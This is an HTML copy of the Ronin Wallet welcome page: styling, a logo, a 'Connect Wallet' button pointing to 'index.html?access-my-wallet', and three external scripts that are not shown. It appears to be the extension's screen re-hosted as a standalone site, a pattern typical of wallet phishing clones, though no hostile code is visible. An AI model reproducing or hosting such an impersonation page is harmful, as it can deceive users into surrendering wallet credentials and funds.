<html lang="en" class="js-focus-visible" data-js-focus-visible=""><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Ronin</title>
    <link rel="icon" href="/roninwallet/images/favicon.png">
  <link rel="stylesheet" href="index.css">
<style>.step-wrapper .connect-line {
top: 17.5px;
}
</style><style>.ds-input-wrapper-large > .ds-input {
width: 100%;
height: 40px;
}
</style><style>@font-face {
font-family: 'Inter';
font-style: normal;
font-weight: 400;
src: url(chrome-extension://fnjhmkhhmkbjkkabndcnnogagogbneec/fonts/Inter-Regular.ttf);
}

@font-face {
font-family: 'Inter';
font-style: normal;
font-weight: 500;
src: url(chrome-extension://fnjhmkhhmkbjkkabndcnnogagogbneec/fonts/Inter-Medium.ttf);
}

@font-face {
font-family: 'Inter';
font-style: normal;
font-weight: 600;
src: url(chrome-extension://fnjhmkhhmkbjkkabndcnnogagogbneec/fonts/Inter-SemiBold.ttf);
}

@font-face {
font-family: 'Inter';
font-style: normal;
font-weight: 700;
src: url(chrome-extension://fnjhmkhhmkbjkkabndcnnogagogbneec/fonts/Inter-Bold.ttf);
}

body {
font-family: 'Inter', Helvetica, Arial, sans-serif;
font-feature-settings: 'calt' off;
}

/* HACK: Delete after update design system */
.well-full .ds-well-content {
width: 100%;
}

:root {
--color-aquatic: #00b8ce;
--color-beast: #ffb812;
--color-bug: #ff5341;
--color-bird: #ff8bbd;
--color-plant: #6cc000;
--color-reptile: #dc8be4;
--color-hidden-1: #c6bdd4;
--color-hidden-2: #beceff;
--color-hidden-3: #129092;
--color-axie: #8d65ff;
--color-savannah: #f99e2e;
--color-forest: #6cc000;
--color-arctic: #dbf0ef;
--color-mystic: #6fccd4;
--color-genesis: #3e7292;
--color-rarity-rare: #09b99b;
--color-rariry-epic: #ffa22a;
--color-rarity-mystic: #ae2aff;
--color-text-arctic: #55586a;

--ronin-rounded: 8px;
--ronin-blue: #1273ea;
--ronin-gradient: linear-gradient(256.28deg, #1c94f4 0%, #1273ea 100%);
--ronin-gradient--reverse: linear-gradient(76.28deg, #1c94f4 0%, #1273ea 100%);
}

.ds-button,
.ds-input,
.ds-dialog,
.ds-tooltip-content,
.ds-popover-content {
border-radius: var(--ronin-rounded);
}

.ds-popover-content {
background-color: transparent;
}

.ds-tooltip-content {
background-color: rgba(21, 26, 48, 0.8);
}

.text-ronin-blue {
color: var(--ronin-blue);
}

.border-ronin-blue {
border-color: var(--ronin-blue);
}

.bg-ronin-blue {
background-color: var(--ronin-blue);
}

.bg-ronin-gradient {
background-image: var(--ronin-gradient);
}

.hover\:bg-ronin-gradient:hover {
background-image: var(--ronin-gradient--reverse);
}

.bg-ronin-gradient-reversed {
background-image: var(--ronin-gradient--reverse);
}

.hover\:bg-ronin-gradient-reversed:hover {
background-image: var(--ronin-gradient);
}

.ds-button.ds-large {
padding-left: 20px;
padding-right: 20px;
}

.ronin-button {
transition: 0.2s ease-in-out;
}

.ronin-button-default {
color: var(--color-white);
background-color: transparent;
}

.ronin-button-default:disabled {
color: var(--color-white);
background-color: transparent;
opacity: 0.5;
}

.ronin-button-default:active {
background-image: linear-gradient(to right, #1773d0 0%, #1773d0 100%);
}

.ronin-button-default:not(:disabled):hover {
filter: brightness(120%);
}

.ronin-minimal-button {
color: var(--ronin-blue);
background-color: var(--color-basic-1);
}

.ronin-minimal-button:disabled {
color: var(--ronin-blue);
background-color: var(--color-basic-1);
opacity: 0.5;
}

.ronin-minimal-button.bg-transparent {
background-color: transparent;
}

.ronin-minimal-button.bg-transparent:disabled {
background-color: transparent;
}

.ronin-ghost-button {
box-shadow: 0 0 0 1px var(--ronin-blue) inset;
color: var(--ronin-blue);
background-color: transparent;
}

.ronin-ghost-button:hover {
background-color: var(--color-primary-1) !important;
}

.ronin-ghost-button.account-card-button:hover {
background-color: var(--color-primary-6) !important;
}

.shadow-none {
box-shadow: none;
}

*::-webkit-scrollbar {
width: 0px;
background: transparent;
}

.scrollbar-hidden::-webkit-scrollbar {
width: 0px;
background: transparent;
}

.scrollbar-hidden .show-scroll-bar::-webkit-scrollbar {
width: 12px;
background-color: var(--color-basic-1);
}

.scrollbar-hidden .show-scroll-bar::-webkit-scrollbar-thumb {
border: 3px solid var(--color-basic-1);
background-color: var(--color-basic-4);
border-radius: 22px;
}

.wrapper {
display: grid;
grid-template-columns: 150px 150px;
grid-gap: 10px;
background-color: #fff;
color: #444;
}

.wrapperColumns {
columns: 2 auto;
}

@keyframes wave {
0% {
  transform: translateX(-100%);
}

60% {
  transform: translateX(100%);
}

100% {
  transform: translateX(100%);
}
}

.banner-image {
position: relative;
display: block;
overflow: hidden;
background: linear-gradient(90deg, #e4e8f2 0%, #f7f9fc 51.04%, #e4e8f2 100%), #e4e8f2;
}

.banner-image::after {
top: 0;
left: 0;
right: 0;
bottom: 0;
content: '';
position: absolute;
animation: wave 1.6s linear 0.5s infinite;
transform: translateX(-100%);
background: linear-gradient(90deg, transparent, rgba(0, 0, 0, 0.04), transparent);
}

.ds-input-wrapper-large > .ds-input {
width: 100%;
height: 40px;
}

.ds-switch .ds-switch-mask {
height: 20px;
width: 36px;
border-radius: 12px;
border: none;
}

.ds-switch .ds-switch-mask-icon {
margin-left: 4px;
margin-right: 4px;
transition-property: background-color, border-color, color, fill, stroke;
border-radius: 7px;
transition-duration: 200ms;
transition-timing-function: linear;
background-color: var(--color-basic-4);
}

.ds-switch .ds-switch-input:checked ~ .ds-switch-mask .ds-switch-mask-icon {
background: white;
}
</style><link type="text/css" rel="stylesheet" charset="UTF-8" href="https://translate.googleapis.com/translate_static/css/translateelement.css"></head>
<body>
  <section id="root" style="margin: auto;"><div class="bg-no-repeat mh-screen" style="background-image: url(&quot;chrome-extension://fnjhmkhhmkbjkkabndcnnogagogbneec/images/0fa701475eab3f1a6bd063a8460faa92.svg&quot;); background-size: 1308px; background-position: center 96px;"><div class="relavtive flex flex-col h-screen"><div class="inline-block w-full mb-44 mt-16"><img class="m-auto" src="/roninwallet/images/logo.png" alt="Ronin logo" style="height: 48px;"></div><div class="flex-1"><div class="mx-auto mt-36 w-full" style="max-width: 500px;"><div class="flex flex-col justify-start pt-40 mt-44" style="padding-left: 59px; padding-right: 59px;"><center><h2 class="mb-24 font-bold">Welcome to Ronin Wallet</h2></center><center><span class="mb-24 text-14">Use this wallet to play Axie Infinity and other applications running on Ronin, an Ethereum sidechain.</span></center><br>
<a href="index.html?access-my-wallet" button="" class="ronin-button ronin-button-default shadow-none bg-ronin-gradient hover:bg-ronin-gradient h-40 mb-16 ds-button ds-large"><div class="w-full text-center text-14">Connect Wallet</div></a><center><span>Need help? Join our <a href="https://discord.gg/axie" target="_blank" class="text-ronin-blue font-semibold hover:underline" rel="noreferrer">Discord</a> server or submit a request on our <a href="https://support.axieinfinity.com/" target="_blank" class="text-ronin-blue font-semibold hover:underline" rel="noreferrer">Support Site</a>.</span></center></div></div></div></div></div></section>
  <script src="vendors.js"></script>
  <script src="ledger.js"></script>
  <script src="full-page.js"></script>


<div id="goog-gt-tt" class="skiptranslate" dir="ltr"><div style="padding: 8px;"><div><div class="logo"><img src="https://www.gstatic.com/images/branding/product/1x/translate_24dp.png" width="20" height="20" alt="Google Translate"></div></div></div><div class="top" style="padding: 8px; float: left; width: 100%;"><h1 class="title gray">Original text</h1></div><div class="middle" style="padding: 8px;"><div class="original-text"></div></div><div class="bottom" style="padding: 8px;"><div class="activity-links"><span class="activity-link">Contribute a better translation</span></div><div class="started-activity-container"><hr style="color: #CCC; background-color: #CCC; height: 1px; border: none;"><div class="activity-root"></div></div></div><div class="status-message" style="display: none;"></div></div><div class="ds-toast-container ds-place-bottom-center"></div><div class="goog-te-spinner-pos"><div class="goog-te-spinner-animation"><svg xmlns="http://www.w3.org/2000/svg" class="goog-te-spinner" width="96px" height="96px" viewBox="0 0 66 66"><circle class="goog-te-spinner-path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle></svg></div></div></body></html>